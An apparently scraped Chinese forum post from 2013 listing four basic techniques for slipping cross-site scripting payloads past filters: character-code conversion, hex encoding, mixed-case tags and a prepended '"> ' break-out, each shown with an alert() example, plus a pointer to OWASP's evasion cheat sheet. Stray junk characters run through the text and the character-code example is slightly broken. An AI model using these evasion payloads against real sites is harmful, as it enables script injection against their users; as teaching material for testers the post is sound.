四种超级基础的绕过方法。$ C s* d4 A `" Y( E
1.转换为ASCII码! f0 H9 V# O; {" i% d8 p- c
例子:原脚本为<script>alert(‘I love F4ck’)</script >' S3 ~0 R" U$ w6 Q3 z/ z
通过转换,变成:3 w9 L$ K7 M f& T! ^
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
, V6 g5 x. Z$ V [% } # s8 c+ V+ X( g* U9 T0 C
2.转换为HEX(十六进制)* {& o4 a: _5 n! N' A Y$ e
例子:原脚本为<script>alert(‘I love F4ck’)</script>
( y, ^' T! w) U. Z$ y0 i通过转换,变成:
) {4 W6 N& u) g/ |, T%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e8 d5 \% S6 l: t7 z
( z$ E) m, o9 w- d3 _7 Z3.转换脚本的大小写) i5 Z! `. a/ U! p* C5 Z) F
例子:原脚本为<script>alert(‘I love F4ck’)</script># k7 J5 {9 |1 `! N, M5 q
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>1 t2 i' E2 D2 y4 I: E
% V, {! f8 |! T/ n
4.增加闭合标记”>
! @1 o5 ^! O) _/ r& `例子:原脚本为<script>alert(‘I love F4ck’)</script>& m8 b& @0 h0 m6 }
转换为:”><script>alert(‘I love F4ck’)</script>4 h. s) ^6 V+ p/ R7 j. R8 a
更详细绕过技术请参考此网页
6 P; k* y( V! M# n. Q& _https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
9 h1 l8 D% R% L- b1 R
, g5 m# w( Y# ]% J8 `7 F: [; G9 d转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
分享
支持
反对